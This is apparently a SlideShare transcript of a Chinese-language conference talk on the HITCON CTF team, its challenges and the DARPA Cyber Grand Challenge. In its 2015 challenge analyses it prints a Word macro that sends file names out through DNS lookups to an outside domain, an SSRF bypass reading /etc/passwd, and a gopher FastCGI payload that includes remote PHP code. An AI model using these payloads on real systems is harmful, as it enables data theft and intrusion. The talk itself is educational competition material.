SlideShare a Scribd company logo
1 of 109
Download to read offline
HITCON 駭客戰隊與CTF經驗分享
李倫銓
HITCON CTF 領隊 & 競賽負責人
• HITCON CTF領隊與競賽負責人
• 交大資工所,台大電機所博士候選人,
目前任職 聯發科技 IT 部門。
• 專長:網路安全相關技術、惡意程式
與流量分析、雲端服務規劃與研究。
2016/8/25 Cloudsec 2016 2
outlines
2016/8/25 Cloudsec 2016 3
• HITCON CTF 戰隊、競賽介紹、題目分析
• 2016 挑戰美國CGC天網機器人探討自動攻防技
術發展(Autonomous Hacking and Patching)
2016/8/25 4
HITCON Pacific
2016/8/25 Cloudsec 2016 5
• HITCON CTF 戰隊、競賽介紹、題目分析
• 2016 挑戰美國CGC天網機器人探討自動攻防技
術發展(Autonomous Hacking and Patching)
HITCON CTF 駭客戰隊
2014年首度打入
DEFCON CTF
獲得亞軍
2016/8/25 Cloudsec 2016 7
• 連續兩年DEFCON CTF種子賽,全球超過3,000人次參與
• 線上初賽共計有來自80 餘國1,024 支隊伍,超過3,000 人次參與;
實體決賽來自11 國家13 支隊伍匯聚台灣。
HITCON CTF 國際競賽
2016/8/25 Cloudsec 2016 8
2016年 概念: 核反應爐 2015年 概念: 星際大戰光劍
決賽結合物聯網聲光效果
• 未受攻擊時,呈現呼吸燈效
• 被攻擊成功會狂閃紅燈
• First Blood時有隱藏版燈效
2016/8/25 Cloudsec 2016 9
對不起
我只是個做家庭代工的
光劍主體
• 使用台灣最知名的馬可多版光劍
• 劍刃共有六段伸縮節
• 劍把,馬可多手工打造電路板
• + 電池 + 喇叭
光劍底座
底座壓克力雷切、Linkit 7688開發板、喇叭
13
Specification
• MT7688
• 128MB DDR2
• 32MB Flash
• Chip Antenna
(default)
• IPEX Ext Antenna
• microSD
• USB Host
• JTAG
劍座接頭D-sub
接上去,就可以放簡報了
• 共地
• 電晶體放大電流
設計理念
當劍在劍座上,由7688控制當劍在手上,由絕地武士控制
所以就出現這種畫面了
好吃又好玩
跑 openwrt
步驟
• uci set network.lan.ipaddr= xxx
• 拷貝光劍音效
• Madplay –S
• 關閉dhcp
• 關閉wireless
• opkg install /root/openssh-sftp-server_6.8p1-
1_ramips_24kec.ipk
透過MRAA來控制GPIO
import mraa
print (mraa.getVersion())
x = mraa.Gpio(13)
x.dir(mraa.DIR_OUT)
x.write(1)
• 剛剛的D1~D6 分別接到GPIO 14-19
製作過程已經放上Hackday.io
• Lightsaber Stand for Hackers - Making a Star Wars
themed lightsaber scoreboard for 2015 HITCON CTF
CTF駭客競賽的型式
1 2
解題型
(Jeopardy)
對打攻防型
(Attack & Defense)
解題型 ( Jeopardy )
主辦單位出題目,參賽者
解題。
常見的題目類型
有: Reverse、 Pwnable、
Crypto、 Forensics、 Misc
於時事相關
HITCON 2015 - PhishingMe(Misc)
• Description
• Sent me a .doc, I will open it if your subject is "HITCON 2015"!
• Find the flag under my file system.
• p.s. I've enabled Macro for you.
• Info
• Point 200
• Solved by 9 (of 969 teams)
HITCON 2015 - PhishingMe(Misc)
• 核心概念
• APT 釣魚信件
• 惡意的 Word 檔案
• Macro 巨集
• 受限的網路環境(無法外連)
• 使用 DNS Tunnel 將敏感文件外傳
• 真實事件改編
HITCON 2015 - PhishingMe(Misc)
http://ctfhacker.com/ctf/phishing/2015/10/19/hitcon-phishingme.html
HITCON 2015 - PhishingMe(Misc)
http://ctfhacker.com/ctf/phishing/2015/10/19/hitcon-phishingme.html
HITCON 2015 - PhishingMe(Misc)
http://ctfhacker.com/ctf/phishing/2015/10/19/hitcon-phishingme.html
Sub AutoOpen()
Dim objHttp: Set objHttp = CreateObject("Microsoft.XMLHTTP")
uri = "http://X.X.X.X/poop/"
objHttp.Open "GET", uri, False
objHttp.send
End Sub
HITCON 2015 - PhishingMe(Misc)
http://ctfhacker.com/ctf/phishing/2015/10/19/hitcon-phishingme.html
Sub AutoOpen()
Dim objShell: Set objShell = CreateObject("WScript.Shell")
objShell.Exec ("%comspec% /c nslookup tun.mydomain.com")
End Sub
HITCON 2015 - PhishingMe(Misc)
Sub AutoOpen()
Dim objShell: Set objShell = CreateObject("WScript.Shell")
Dim objFSO: Set objFSO = CreateObject("Scripting.FileSystemObject")
Dim objFolder: Set objFolder = objFSO.GetFolder(".")
objShell.Exec ("%comspec% /c nslookup " & objFolder.Path & ".tun.mydomain.com")
Set colFiles = objFolder.Files
buff = ""
For Each objFile In colFiles
buff = Replace(objFile.Name, " ", "_")
buff = Replace(buff, ".", "_")
objShell.Exec ("%comspec% /c nslookup " & buff & ".tun.mydomain.com")
Next
End Sub
HITCON 2015 - PhishingMe(Misc)
• Write-Ups
• https://github.com/pwning/public-
writeup/blob/master/hitcon2015/misc200-
phishingme/writeup.md
• http://ctfhacker.com/ctf/phishing/2015/10/19/hitcon-
phishingme.html
HITCON 2015 - Lalala(Web)
• Description
• get the shell!
• http://54.65.226.23
• Info
• Point 400
• Solved by 2 (of 969 teams)
• 網站功能
• 使用者上傳圖片
• 提供 URL 網站幫你下載圖片
2016/8/25 Cloudsec 2016 35
HITCON 2015 - Lalala(Web)
• 核心概念
• 黑箱找出 SSRF
• 使用 302 跳轉繞過 SSRF 限制。
• 使用 file:// 協議進行任意讀檔,另像是用dict取得libcurl, 用sftp取得libssh版本
Server的語言在建立socket的時候大多與遠端資源互動取得banner(ascii明碼)
• 發現 Nginx 使用 Fast CGI 協議
• 使用 gopher:// 協議偽造 Fast CGI 協議執行惡意 PHP 代碼
<?php header("Location: sftpt://orange.tw:12345/");
由該主機發出的ssh版本資訊
HITCON 2015 - Lalala(Web)
• 下載圖片檢查
$url = $_POST['url'];
$filename = $_SERVER['REMOTE_ADDR'] . '.jpg';
$allowed_ext = array('jpg', 'gif', 'png', 'jpeg');
if ( !in_array(pathinfo($url)['extension'],
$allowed_ext) ){
alert( 'ext not allow' );
}
if ( substr($url, 0, 7) != 'http://' ){
alert( 'protocol error' );
}
if ( stristr($url, '.php') != False ){
alert( 'what do you do?' );
}
if ( stristr($url, 'file://') != False ){
HITCON 2015 - Lalala(Web)
• 繞過檢查
• 使用 302
• ?url=http://orange.tw/a.php?z=a.jpg
<?php
header("Location: file://localhost/etc/passwd");
HITCON 2015 - Lalala(Web)
• 讀取 /etc/nginx/sites-enabled/default 發現使用 Fast CGI
• 偽造 Fast CGI Protocol 達成 RCE
• Location:
gopher://127.0.0.1:9001/x%01%01i%13%00%08%00%00%00%01%00%00%00%00%00%00%01%04i%1
3%00%8B%00%00%0E%03REQUEST_METHODGET%0F%0FSCRIPT_FILENAME/_www/index.php%0F%16PH
P_ADMIN_VALUEallow_url_include%20%3D%20On%09%26PHP_VALUEauto_prepend_file%20%3D%
20http%3A//orange.tw/x%01%04i%13%00%00%00%00%01%05i%13%00%00%00%00
(使用 PHP_ADMIN_VALUE 把 allow_url_include 設成 on
以及新增 auto_prepend_file 到自己的網站)
HITCON 2015 - Lalala(Web)
• Writeups
• https://docs.google.com/document/d/1eALKwCyogM5Mw_D4qW
e48X-PAGZw_2vT82aP0EPIr-8/mobilebasic?pli=1
HITCON 2015 - Readable(Pwn)
• Description
• Can you read everything ?
• nc 52.68.53.28 56746
• 檔案: readable-9e377f8e1e38c27672768310188a8b99
• Info
• Point 300
• Solved by 8 (of 969 teams)
HITCON 2015 - Readable(Pwn)
• 核心概念
• 程式碼很短,只有兩行
• 64bits, NX / ASLR 開啟
• Libc 未知
• Buffer Overflow 但是只有 16 Bytes
• 太短無法 ROP
• 沒有 leak 無法跳 One-Gadget (不知道libc的位置
int main(int argc, char *argv[]) {
char buf[16];
return read(0, buf, 32);
}
HITCON 2015 - Readable(Pwn)
• ROP 太短怎麼辦?
• 透過 Stack Migration 把 Stack 搬到 BSS 上
• 重複跳 read 16 將 ROP Chain 放到 BSS 上
• 沒有 puts printf 等函數無法 leak 怎麼辦?
• 不要 leak 直接跳 execve
• Binary 要做 ROP 沒有 syscall 指令怎麼辦?
• 透過覆蓋 read 位置最後 1 byte 跳到 syacall 指令
• (因為 read 函數很短,所以 GOT 中 read 地址附近一定有 syscall)
HITCON 2015 - Readable(Pwn)
• Writeups
• https://github.com/pwning/public-
writeup/blob/master/hitcon2015/pwn300-readable/writeup.md
Attack & Defense 零和賽制
每回合
5min
A
攻擊成功
得分+10 扣分 -10
B
Attack & Defense 賽制說明
1
每個隊伍獲得一個
有漏洞服務的主機
2 3 4
分析主機上的漏洞
找到漏洞利用的方式
將漏洞寫成攻擊程序
並攻擊其他隊伍
透過攻擊
獲取主機上的 Flag
將 Flag 提交給大會
得分
💀 Service
💀 Service
💀 Service
A
0day漏洞很可怕
B
C
D
E
😆
無法防禦
無法防禦
無法防禦
無法防禦
😣
😣
😣
😣
得分+40
扣分 -10
扣分 -10
扣分 -10
扣分 -10
攻
擊
成
功
不但會新增題目,還會變化
💀 Service
💀 Service
💀 Service
時間到
出現新漏洞!
舊漏洞沒了!
💀
主辦單位會隨時間更新服
務,反應真實世界服務的
變化性,讓比賽更刺激
關閉服務會被扣分
每回合
5min
A 攻擊失敗
扣掉所有得分
C
B
Service
Unavailable
均分給每個隊伍
隊中成員必須各司其職
漏洞分析 修補服務漏洞 撰寫自動攻擊程式
CTF比賽
真實世界
參賽隊伍需要具備分析
漏洞、修補漏洞、撰寫
exploit、熟悉各類 IT
技術、通訊協定與工具,
比賽所公布的題目相當
於縮小版的商用軟體或
線上服務
商用軟體或線上服務的
使用者熟悉各種IT技術、
通訊協定與工具
CTF比賽
真實世界
最早挖到 0day 隊伍,
得以橫掃全場搶分,隨
著每回合時間過去,有
隊伍寫出修補程式後,
得分率下降 0day 出現時還沒有任
何修補程式,造成的危
害最大
CTF比賽
真實世界
避免有隊伍怕服務遭攻
擊而刻意關閉,每回合
會檢查服務狀況,若關
閉則會將分數平分給服
務存活的隊伍 服務狀態必須持續在
online,不能因為有任
何攻擊就關閉服務
CTF比賽
真實世界
主辦單位會不定期更新
服務版本,因此會出現
新的漏洞
服務軟體經常會更新版
本,可能會出現新的資
安問題
First Blood動畫!!
第一個找出漏洞並成功發動攻擊取分的隊伍
2016/8/25 Cloudsec 2016 56
• HITCON CTF 戰隊、競賽介紹、題目分析
• 2016 挑戰美國CGC天網機器人探討自動攻防技
術發展(Autonomous Hacking and Patching)
這部分是講去年八月在DEFCON的兩個比賽
1. DARPA 辦的 CGC (第一次辦)
2. LegitBS 辦的 DEFCON CTF 2016
2016/8/25 Cloudsec 2016 57
DARPA CGC
(Cyber Grand Challenge)
2013-2016
2016/8/25 Cloudsec 2016 58
DARPA 這個 CGC 企劃究竟是什麼?
CGC (Cyber Grand Challenge)
歷史上第一次完全由電腦互打的競賽,完全沒有人類參與
2016/8/25 Cloudsec 2016 59
• 2003年1月25日,SQL Slammer 蠕蟲短短10分鐘內,
感染七萬多台主機。
• 2010 MS LNK漏洞MS10-045,微軟Patch一次還不夠,
2015年又被挖出沒修好。
2016/8/25 Cloudsec 2016 60
NSS 這張圖顯示了當exploit 出現時,大部分的IPS無法偵測
來源: DARPA2016/8/25 Cloudsec 2016 61
FireEYE 2014年這張圖顯示,大量惡意程式生成期越來越短
來源: DARPA
2016/8/25 Cloudsec 2016 62
DARPA 認為光靠人類是不夠的,只有靠電腦的
秒級的速度和有系統的判斷,才能控制威脅。
2016/8/25 Cloudsec 2016 63
我知道你心裡會想到這個
天網要來毀滅人類了
2016/8/25 Cloudsec 2016 64
當然 ~ DARPA 也想到了…
2016/8/25 Cloudsec 2016 65
2015 CTF 比賽結束的時候,主辦單位對我們說:
“2016 的CTF ,來自全世界的駭客隊伍將
一起對抗來自 DARPA 的自動攻擊機器人!”
+ =
最強人類駭客大賽
DEFCON CTF
CGC機器人冠軍
參在一起做成…
然後就
…. 搞死我們了
2016/8/25 Cloudsec 2016 66
人類
人類
人類
人類
機器冠軍
DEFCON CTF 2016 的概念
就是一個機器人邀請人類去
他家打牌的概念。用的是他
的牌、牌桌也是他的。
CGC賽制
2016/8/25 Cloudsec 2016 67
CGC 背景介紹
2016/8/25 Cloudsec 2016 68
DECREE 環境 -
2016/8/25 Cloudsec 2016 69
因為真實世界作業系統發展至今,太
過複雜而且已經有各種保護機制,但
DARPA給了一個簡單的起點
• DECREE上面的程式漏洞沒辦
法用在真實世界的作業系統,
真實世界的程式漏洞沒辦法
用在DECREE裡面
• DECREE是 Opensource
單純性
限制性
Text vs Code of trivial program
來源: DARPA2016/8/25 Cloudsec 2016 70
Graph of trivial program
既有 OS 環境太複
雜,導致分析分
支太大無法運算
來源: DARPA
2016/8/25 Cloudsec 2016 71
Cyber Reasoning System (CRS)
每個隊伍要做出一台
CRS(Cyber reasoning System)
網路推理決策系統,來搶
第一名 200萬美金
這個CRS要做到
• 找出軟體漏洞
• 修補軟體問題 (PCB)
• 分析攻擊
• 設定防火牆
• 製作攻擊( POV)
• Intel Xeon
1280 cores
• 16 TB Ram
• 128 TB storage
2016/8/25 Cloudsec 2016 72
CGC 預賽與決賽
2016/8/25 Cloudsec 2016 73
David Brumley, CMU - CTF (PPP)
CTF (shellphish)
前天opensource
Dawn Song, Berkeley
師
徒
對
決
喬治亞理工
2016/8/25 Cloudsec 2016 74
Forallsecure
MAYHEM
Techx
XANDRA
SHELLPHISH
Mechnical phish
1
2 32016/8/25 Cloudsec 2016 75
全場動畫呈現 CRS 分析、攻擊、與存活
2016/8/25 Cloudsec 2016 76
CRS 對程式的分析過程可以透過trace呈現出來
2016/8/25 Cloudsec 2016 77
剛剛噴的流量,裡面其實是參雜著存活檢測(Polls) +各隊攻擊封包(POV)
2016/8/25 Cloudsec 2016 78
每一個CB都需要通過數個Poll檢查
服務被打爆就裸出來
齒輪代表
修補中
2016/8/25 Cloudsec 2016 79
Availability
Security
Evaluation
除了會用不同方法檢查是否符合功
能完整性,還會看time, memory
usage, and space efficiency,大概共
有10-30個檢查
例: 12/25
0~1
1 or 2
1~2
X
X
服務有沒有被打下來
1 or 2
攻擊可以成功打幾隊?
例:4/6 (打下四隊)
Scoring 評分系統有三大指標
X
1002016/8/25 Cloudsec 2016 80
2016/8/25 Cloudsec 2016 81
來源: DARPA2016/8/25 Cloudsec 2016 82
原 Attack defense 賽制 CGC 賽制
題目量 一場約6個services,外加改版
CGC共高達8x個Challenge Binaries
而這次CTF則有8個 CB
題目難度
涵蓋X86、ARM等等真實生活的
程式縮小版
DECREE版本(7 syscalls)的Binary模擬一
般常見服務漏洞撰寫方式
攻擊流量 提供隊伍下載攻擊流量
提供隊伍下載攻擊流量,但不是一般
網路流量,反倒是像input/output值
發動攻擊方
式
隊伍寫出exploit直接打對方隊伍
繳交所謂POV給裁判來統一驗證
POV 有tyep1 type2兩種
存活檢查
由主辦方直接檢測隊伍的
services
繳交PCB(patched Challenge Binary)給
裁判來統一驗證
修補 不給root只能做binary patch
做出PCB繳交給裁判驗證,但是提交
PCB下一回合將會0分,應該是不讓你
自動亂修補
其他 不給root不能設防火牆
可以繳交防火牆規則,用類似regular
expression來阻擋
2016/8/25 Cloudsec 2016 83
要自動化前,讓我們先了解人類如何找
漏洞、修復漏洞、寫出exploit
2016/8/25 Cloudsec 2016 84
人類分析binary已經有很多好工具了
2016/8/25 Cloudsec 2016 85
2016/8/25 Cloudsec 2016 86
2016/8/25 Cloudsec 2016 87
再來看,機器如何自動化?
• 如何 Crash binary ?
• 動態分析 / Fuzzing
• Symbolic Execution
• 如何自動 Patch? Generic patch?
• 如何自動分析 Network 封包並 Replay?
2016/8/25 Cloudsec 2016 88
如何自動 Patch? Generic patch?
But!! 可能程式中有很多這種區塊,
大量的對不確定記憶體存取加上
檢查,會有效能問題。
而CGC的poll檢查就包括了執行效
能!!
來源: forallsecure
假設ecx指向下一個寫入的位置,並在這程式存在out-of-
bound read/write, 那我們可以插入一段程式去做檢查
來patch掉這個漏洞
2016/8/25 Cloudsec 2016 89
來源: DARPA2016/8/25 Cloudsec 2016 90
CRS 設計 – 以ShellPhish 為例
來源:shellphish
http://angr.io
2016/8/25 Cloudsec 2016 91
人類 VS 機器 - 獲勝的關鍵 – Binary 複雜度
• 人類
• 優勢:
• 人類擅長分析以前沒出現
過的pattern
• 可以適應主辦程式寫錯
• 劣勢:
• 要睡覺
• 錢給少,心就委屈,然後
就會犯錯
2016/8/25 Cloudsec 2016 92
•機器
• 優勢
• 能處理大量題目
• 速度快、能升級
• 劣勢
• 目前難以處理較為複雜的題目
• 沒辦法適應環境變化或錯誤
• 李師父,攻他電路
辦 CGC 比賽還有一個關鍵,就是
DATA SET(題目) 的完整性
CGC Binary是否足以代表目前幾個重要的漏洞問題?
Buffer overflow?
Stack overflow ?
Heap overflow?
Memory leakage?2016/8/25 Cloudsec 2016 93
Finalists POV
2016/8/25 Cloudsec 2016 94來源: DARPA
題目
Finalists – POV on bottom, avail on Top
2016/8/25 Cloudsec 2016 95來源: DARPA
題目
Finalists – CWE-120 Buffer Overflow
2016/8/25 Cloudsec 2016 96來源: DARPABO分布
Finalists – CWE-121 Stack Overflow
2016/8/25 Cloudsec 2016 97來源: DARPA
Finalists – CWE-122 Heap Overflow
2016/8/25 Cloudsec 2016 98來源: DARPA
Finalists – CWE-125 Out of Bounds Read
2016/8/25 Cloudsec 2016 99來源: DARPA
Finalists – CWE-787 Out of Bounds Write
2016/8/25 Cloudsec 2016 100來源: DARPA
Finalists – CWE-476 Null point Deref
2016/8/25 Cloudsec 2016 101
根據各隊解題狀況
的數據顯示,機器
非常擅長處理這類
漏洞
來源: DARPA
整場 CTF 賽事感想
1. 0day 不值錢,天才都哭了,你會replay就有機會
2. CTF主辦單位題目難度無法提高,因為竟然要考慮
到機器的心情
• 美國大駭客 Geohot、韓國天才 Loki 無法發揮人類最
高智商,loki 打完生氣到跑回飯店。
3. 難度沒提高也就算了,D1 , D2機器人線還沒接好
所以沒發揮機器人優勢
• 也不知道還能不能看到下次機器人發揮的機會
2016/8/25 Cloudsec 2016 102
2002-2016年 DEFCON CTF 前三名國家來看資安
人才發展
2016/8/25 Cloudsec 2016 103
2016 PPP USA b1o0p CHINA DEFKOR South Korea
Taiwan
Taiwan
台灣CP值
真的還不
錯,值得
繼續投資
那麼回到大家關注的問題,機器人打得贏人嗎
• 其實這次比賽並不完整,因為線沒接好
• 冠軍Mayhem 斷線兩天,第二天結束還可以打贏美國兩隊
(Dragon Sector 和 Samurai ) XDDD
2016/8/25 Cloudsec 2016 104
第一天抱怨API
第二天抱怨流量沒進來
然後~~~~ CTF 最後一天接上完整流量
• Mayhem 竟然 9 個 binary 它找到 7 個
exploit,6 個上 patch。
2016/8/25 Cloudsec 2016 105
秘辛#1 : 機器人冠軍Mayhem在
打 CGC 聽說打了一半就當機,最
後還拿CGC冠軍。
八卦是-> 前面的binary聽說比較簡單
秘辛#2 :
• PPP的 Patch 留有後門。賽制中你可以拿其他隊的patch自己用,
所以全場很自然的會去抓第一名隊伍(which is PPP)的patch來
用,結果安裝他的patch之後全場都被他打,這招打得全場呱呱
叫。據說~~ Mayhem機器人也有這個功能
2016/8/25 Cloudsec 2016 106
Conclusion
• DARPA 已經release CGC相關資源,包括初賽題目、計分狀況、比賽規則、
DECREE github 相關code、決賽題目等等。
• 第三名CGC隊伍 Shellphish 前天公開他們的機器人原始碼
• 自動化攻防究竟會不會打敗人類? 電腦會不會統治世界?
• DARPA的成功在於,
• 找到一個好理由,讓大家投入自動化挖洞研究
• 設計一個好賽制,讓大家自己拼命去爭取那200萬美金
• 拉DEFCON CTF下水,讓機器人當一隊,還說是全人類要挑戰電腦,創造議
題
• CGC企劃,成功把產業趨勢、學術研究上最難的dataset驗證、CTF
大賽串起來,造成相當的話題,便是給予資安環境相當高的貢獻
• 簡單/固定樣式的洞 -> 交給機器人 。複雜/創新的洞 -> 交給人類
2016/8/25 Cloudsec 2016 107
Script
kiddies
以前
已知漏洞
Metasploit
未來
Script
kiddies
未知漏洞
Mayham
Take Control ?? 小孩也行
2016/8/25 Cloudsec 2016 108
Q/A ?
alan@hitcon.org
2016/8/25 Cloudsec 2016 109

More Related Content

What's hot

Geep networking stack-linuxkernel
Geep networking stack-linuxkernelGeep networking stack-linuxkernel
Geep networking stack-linuxkernelKiran Divekar
 
AICamp - Dr Ramine Tinati - Making Computer Vision Real
AICamp - Dr Ramine Tinati - Making Computer Vision RealAICamp - Dr Ramine Tinati - Making Computer Vision Real
AICamp - Dr Ramine Tinati - Making Computer Vision RealRamine Tinati
 
X13 Products + Intel® Xeon® CPU Max Series–An Applications & Performance View
X13 Products + Intel® Xeon® CPU Max Series–An Applications & Performance ViewX13 Products + Intel® Xeon® CPU Max Series–An Applications & Performance View
X13 Products + Intel® Xeon® CPU Max Series–An Applications & Performance ViewRebekah Rodriguez
 
Ext4 write barrier
Ext4 write barrierExt4 write barrier
Ext4 write barrierSomdutta Roy
 
Brief introduction to kselftest
Brief introduction to kselftestBrief introduction to kselftest
Brief introduction to kselftestSeongJae Park
 
An Overview of [Linux] Kernel Lock Improvements -- Linuxcon NA 2014
An Overview of [Linux] Kernel Lock Improvements -- Linuxcon NA 2014An Overview of [Linux] Kernel Lock Improvements -- Linuxcon NA 2014
An Overview of [Linux] Kernel Lock Improvements -- Linuxcon NA 2014Davidlohr Bueso
 

What's hot (12)

Black Out3.ppt
Black Out3.pptBlack Out3.ppt
Black Out3.ppt
 
GPU Computing
GPU ComputingGPU Computing
GPU Computing
 
MQTT
MQTTMQTT
MQTT
 
Mqtt
MqttMqtt
Mqtt
 
Embedded Virtualization applied in Mobile Devices
Embedded Virtualization applied in Mobile DevicesEmbedded Virtualization applied in Mobile Devices
Embedded Virtualization applied in Mobile Devices
 
Geep networking stack-linuxkernel
Geep networking stack-linuxkernelGeep networking stack-linuxkernel
Geep networking stack-linuxkernel
 
AICamp - Dr Ramine Tinati - Making Computer Vision Real
AICamp - Dr Ramine Tinati - Making Computer Vision RealAICamp - Dr Ramine Tinati - Making Computer Vision Real
AICamp - Dr Ramine Tinati - Making Computer Vision Real
 
X13 Products + Intel® Xeon® CPU Max Series–An Applications & Performance View
X13 Products + Intel® Xeon® CPU Max Series–An Applications & Performance ViewX13 Products + Intel® Xeon® CPU Max Series–An Applications & Performance View
X13 Products + Intel® Xeon® CPU Max Series–An Applications & Performance View
 
Ext4 write barrier
Ext4 write barrierExt4 write barrier
Ext4 write barrier
 
Brief introduction to kselftest
Brief introduction to kselftestBrief introduction to kselftest
Brief introduction to kselftest
 
An Overview of [Linux] Kernel Lock Improvements -- Linuxcon NA 2014
An Overview of [Linux] Kernel Lock Improvements -- Linuxcon NA 2014An Overview of [Linux] Kernel Lock Improvements -- Linuxcon NA 2014
An Overview of [Linux] Kernel Lock Improvements -- Linuxcon NA 2014
 
Parallel Computing on the GPU
Parallel Computing on the GPUParallel Computing on the GPU
Parallel Computing on the GPU
 

Viewers also liked

2016 ModernWeb 分享 - 恰如其分 MySQL 程式設計 (修)
2016 ModernWeb 分享 - 恰如其分 MySQL 程式設計 (修)2016 ModernWeb 分享 - 恰如其分 MySQL 程式設計 (修)
2016 ModernWeb 分享 - 恰如其分 MySQL 程式設計 (修)Win Yu
 
Docker 進階實務班
Docker 進階實務班Docker 進階實務班
Docker 進階實務班Philip Zheng
 
時代在變 Docker 要會:台北 Docker 一日入門篇
時代在變 Docker 要會:台北 Docker 一日入門篇時代在變 Docker 要會:台北 Docker 一日入門篇
時代在變 Docker 要會:台北 Docker 一日入門篇Philip Zheng
 
聊天機器人:一個沒有小編的世界
聊天機器人:一個沒有小編的世界聊天機器人:一個沒有小編的世界
聊天機器人:一個沒有小編的世界佳新 陳
 
容器與資料科學應用
容器與資料科學應用容器與資料科學應用
容器與資料科學應用Philip Zheng
 
用 Bitbar Tool 寫 Script 自動擷取外幣
用 Bitbar Tool 寫 Script 自動擷取外幣用 Bitbar Tool 寫 Script 自動擷取外幣
用 Bitbar Tool 寫 Script 自動擷取外幣Win Yu
 
企業導入容器經驗分享與開源技能培養
企業導入容器經驗分享與開源技能培養企業導入容器經驗分享與開源技能培養
企業導入容器經驗分享與開源技能培養Philip Zheng
 
容器驅動開發 - .NET Conf 2017 @ 台中
容器驅動開發 - .NET Conf 2017 @ 台中容器驅動開發 - .NET Conf 2017 @ 台中
容器驅動開發 - .NET Conf 2017 @ 台中Andrew Wu
 
容器與 Gitlab CI 應用
容器與 Gitlab CI 應用容器與 Gitlab CI 應用
容器與 Gitlab CI 應用Philip Zheng
 
容器與IoT端點應用
容器與IoT端點應用容器與IoT端點應用
容器與IoT端點應用Philip Zheng
 
API Token 入門
API Token 入門API Token 入門
API Token 入門Andrew Wu
 
與設計架構當朋友
與設計架構當朋友 與設計架構當朋友
與設計架構當朋友 Win Yu
 
大型 Web Application 轉移到 微服務的經驗分享
大型 Web Application 轉移到微服務的經驗分享大型 Web Application 轉移到微服務的經驗分享
大型 Web Application 轉移到 微服務的經驗分享Andrew Wu
 
Continuous Delivery - 敏捷開發的最後一哩路
Continuous Delivery - 敏捷開發的最後一哩路Continuous Delivery - 敏捷開發的最後一哩路
Continuous Delivery - 敏捷開發的最後一哩路Miles Chou
 
PHP 良好實踐 (Best Practice)
PHP 良好實踐 (Best Practice)PHP 良好實踐 (Best Practice)
PHP 良好實踐 (Best Practice)Win Yu
 
無瑕的程式碼 Clean Code 心得分享
無瑕的程式碼 Clean Code 心得分享無瑕的程式碼 Clean Code 心得分享
無瑕的程式碼 Clean Code 心得分享Win Yu
 
[系列活動] 一天搞懂對話機器人
[系列活動] 一天搞懂對話機器人[系列活動] 一天搞懂對話機器人
[系列活動] 一天搞懂對話機器人台灣資料科學年會
 

Viewers also liked (17)

2016 ModernWeb 分享 - 恰如其分 MySQL 程式設計 (修)
2016 ModernWeb 分享 - 恰如其分 MySQL 程式設計 (修)2016 ModernWeb 分享 - 恰如其分 MySQL 程式設計 (修)
2016 ModernWeb 分享 - 恰如其分 MySQL 程式設計 (修)
 
Docker 進階實務班
Docker 進階實務班Docker 進階實務班
Docker 進階實務班
 
時代在變 Docker 要會:台北 Docker 一日入門篇
時代在變 Docker 要會:台北 Docker 一日入門篇時代在變 Docker 要會:台北 Docker 一日入門篇
時代在變 Docker 要會:台北 Docker 一日入門篇
 
聊天機器人:一個沒有小編的世界
聊天機器人:一個沒有小編的世界聊天機器人:一個沒有小編的世界
聊天機器人:一個沒有小編的世界
 
容器與資料科學應用
容器與資料科學應用容器與資料科學應用
容器與資料科學應用
 
用 Bitbar Tool 寫 Script 自動擷取外幣
用 Bitbar Tool 寫 Script 自動擷取外幣用 Bitbar Tool 寫 Script 自動擷取外幣
用 Bitbar Tool 寫 Script 自動擷取外幣
 
企業導入容器經驗分享與開源技能培養
企業導入容器經驗分享與開源技能培養企業導入容器經驗分享與開源技能培養
企業導入容器經驗分享與開源技能培養
 
容器驅動開發 - .NET Conf 2017 @ 台中
容器驅動開發 - .NET Conf 2017 @ 台中容器驅動開發 - .NET Conf 2017 @ 台中
容器驅動開發 - .NET Conf 2017 @ 台中
 
容器與 Gitlab CI 應用
容器與 Gitlab CI 應用容器與 Gitlab CI 應用
容器與 Gitlab CI 應用
 
容器與IoT端點應用
容器與IoT端點應用容器與IoT端點應用
容器與IoT端點應用
 
API Token 入門
API Token 入門API Token 入門
API Token 入門
 
與設計架構當朋友
與設計架構當朋友 與設計架構當朋友
與設計架構當朋友
 
大型 Web Application 轉移到 微服務的經驗分享
大型 Web Application 轉移到微服務的經驗分享大型 Web Application 轉移到微服務的經驗分享
大型 Web Application 轉移到 微服務的經驗分享
 
Continuous Delivery - 敏捷開發的最後一哩路
Continuous Delivery - 敏捷開發的最後一哩路Continuous Delivery - 敏捷開發的最後一哩路
Continuous Delivery - 敏捷開發的最後一哩路
 
PHP 良好實踐 (Best Practice)
PHP 良好實踐 (Best Practice)PHP 良好實踐 (Best Practice)
PHP 良好實踐 (Best Practice)
 
無瑕的程式碼 Clean Code 心得分享
無瑕的程式碼 Clean Code 心得分享無瑕的程式碼 Clean Code 心得分享
無瑕的程式碼 Clean Code 心得分享
 
[系列活動] 一天搞懂對話機器人
[系列活動] 一天搞懂對話機器人[系列活動] 一天搞懂對話機器人
[系列活動] 一天搞懂對話機器人
 

Similar to HITCON駭客戰隊與CTF經驗分享

從 HITCON 駭客戰隊 挑戰美國CGC天網機器人探討自動攻防技術發展 (Autonomous Hacking and Patching)
從 HITCON 駭客戰隊挑戰美國CGC天網機器人探討自動攻防技術發展(Autonomous Hacking and Patching)從 HITCON 駭客戰隊挑戰美國CGC天網機器人探討自動攻防技術發展(Autonomous Hacking and Patching)
從 HITCON 駭客戰隊 挑戰美國CGC天網機器人探討自動攻防技術發展 (Autonomous Hacking and Patching)Alan Lee
 
Spirent_securityLab-服務介紹_2022.pdf
Spirent_securityLab-服務介紹_2022.pdfSpirent_securityLab-服務介紹_2022.pdf
Spirent_securityLab-服務介紹_2022.pdfssuserdfa916
 
新技术新挑战
新技术新挑战新技术新挑战
新技术新挑战xiang.zhaox
 
一個微信專案從0到000的效能調教
一個微信專案從0到000的效能調教一個微信專案從0到000的效能調教
一個微信專案從0到000的效能調教Bruce Chen
 
20170430 python爬蟲攻防戰-攻防與金融大數據分析班
20170430 python爬蟲攻防戰-攻防與金融大數據分析班20170430 python爬蟲攻防戰-攻防與金融大數據分析班
20170430 python爬蟲攻防戰-攻防與金融大數據分析班Paul Chao
 
twMVC#22 | 什麼鬼的IOC與DI
twMVC#22 | 什麼鬼的IOC與DItwMVC#22 | 什麼鬼的IOC與DI
twMVC#22 | 什麼鬼的IOC與DItwMVC
 
Google雲端 第一章準備篇
Google雲端 第一章準備篇Google雲端 第一章準備篇
Google雲端 第一章準備篇gracebrainyu
 
Twitter Wanghongyang Backup Security 20090402 0713
Twitter Wanghongyang Backup Security 20090402 0713Twitter Wanghongyang Backup Security 20090402 0713
